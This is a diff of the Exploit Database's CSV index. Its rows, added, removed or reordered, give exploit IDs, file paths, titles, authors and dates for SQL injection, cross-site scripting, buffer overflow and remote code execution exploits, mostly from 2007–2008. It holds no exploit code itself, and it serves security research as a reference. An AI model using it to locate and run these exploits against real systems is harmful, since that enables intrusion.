'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 Error Page Cross-Site Scripting Vulnerability",2007-10-15,SkyOut,hardware,remote,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting Vulnerability",2007-10-15,JosS,java,webapps,0 @@ -27514,8 +27633,13 @@ id,file,description,date,author,platform,type,port 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 +30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 +30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 30688,platforms/hardware/webapps/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 +31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 +31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 +31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 @@ -27544,6 +27668,9 @@ id,file,description,date,author,platform,type,port 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0 30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.PHP SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0 30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow Vulnerability",2007-10-29,anonymous,windows,remote,0 +30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting Vulnerability",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 +30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection Vulnerability",2007-11-26,"Aria-Security Team",asp,webapps,0 +30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27603,32 +27730,16 @@ id,file,description,date,author,platform,type,port 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow Vulnerability",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 -30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 +31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0 +30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability",2008-01-02,greyvoip,multiple,dos,0 +30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0 +30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,metasploit,php,remote,80 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 -30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 -30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 -30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 -30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 -30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 -30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 -30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 -30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 -30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 -30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0 -30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 -30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0 -30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0 -30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 -30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 -30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting Vulnerability",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 -30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection Vulnerability",2007-11-26,"Aria-Security Team",asp,webapps,0 -30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 -30809,platforms/windows/remote/30809.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal Vulnerability",2007-11-26,"Corey Lebleu",windows,remote,0 -30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 Password Parameter SQL Injection Vulnerability",2007-11-26,JosS,php,webapps,0 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 Index.PHP Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 Ierpplug.DLL PlayerProperty ActiveX Control Buffer Overflow Vulnerability",2007-11-26,"Elazar Broad",windows,dos,0 30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 Index.PHP Cross-Site Scripting Vulnerability",2007-11-26,JosS,php,webapps,0 @@ -27656,7 +27767,7 @@ id,file,description,date,author,platform,type,port 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 -30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x,Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 +30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -27683,19 +27794,6 @@ id,file,description,date,author,platform,type,port 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30865,platforms/php/webapps/30865.txt,"DomPHP <= 0.83 - Local Directory Traversal Vulnerability",2014-01-12,Houssamix,php,webapps,0 -30872,platforms/php/webapps/30872.txt,"DomPHP <= 0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0 -30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0 -30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0 -30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0 -30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL XSS",2007-11-10,Doz,php,webapps,0 -30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 -30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include Vulnerability",2007-11-10,d3v1l,php,webapps,0 -30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting Vulnerability",2007-11-10,"Remco Verhoef",hardware,remote,0 -30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free Vulnerability",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 register.php Cross-Site Scripting Vulnerability",2007-11-12,"Omer Singer",php,webapps,0 30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection Vulnerability",2007-12-13,"Sw33t h4cK3r",php,webapps,0 @@ -27712,7 +27810,6 @@ id,file,description,date,author,platform,type,port 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 -30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 @@ -27734,6 +27831,7 @@ id,file,description,date,author,platform,type,port 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0 +30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 @@ -27757,7 +27855,7 @@ id,file,description,date,author,platform,type,port 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 -30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 +30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x staff_del_confirm.php Multiple Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x theme_del_confirm.php name Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 @@ -27767,7 +27865,6 @@ id,file,description,date,author,platform,type,port 30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 -30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 - search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0 30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 - search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0 30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0 @@ -27779,24 +27876,14 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 -30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 -30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 -30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 -30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 -30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 -30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 -30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability",2008-01-02,greyvoip,multiple,dos,0 -30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0 -30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0 -30985,platforms/linux/dos/30985.txt,"'libcdio' 0.7x GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 +30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 +31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0 30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 - 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 @@ -27822,6 +27909,7 @@ id,file,description,date,author,platform,type,port 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Include Vulnerability",2008-01-11,ShipNX,php,webapps,0 +31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery Vulnerability",2008-01-15,hkm,hardware,remote,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 @@ -27831,13 +27919,6 @@ id,file,description,date,author,platform,type,port 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0 -31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 -31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0 -31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0 -31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 -31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 -31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0 -31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution Vulnerability",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 @@ -27889,8 +27970,6 @@ id,file,description,date,author,platform,type,port 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0 31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0 -31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0 -31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0 31084,platforms/php/webapps/31084.txt,"Archimede Net 2000 - 'E-Guest_show.php' SQL Injection Vulnerability",2008-02-01,"Sw33t h4cK3r",php,webapps,0 31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80 31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Stored XSS",2014-01-20,"Saeed reza Zamanian",php,webapps,80 @@ -27971,10 +28050,19 @@ id,file,description,date,author,platform,type,port 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 +31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 +31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0 +31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 +31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 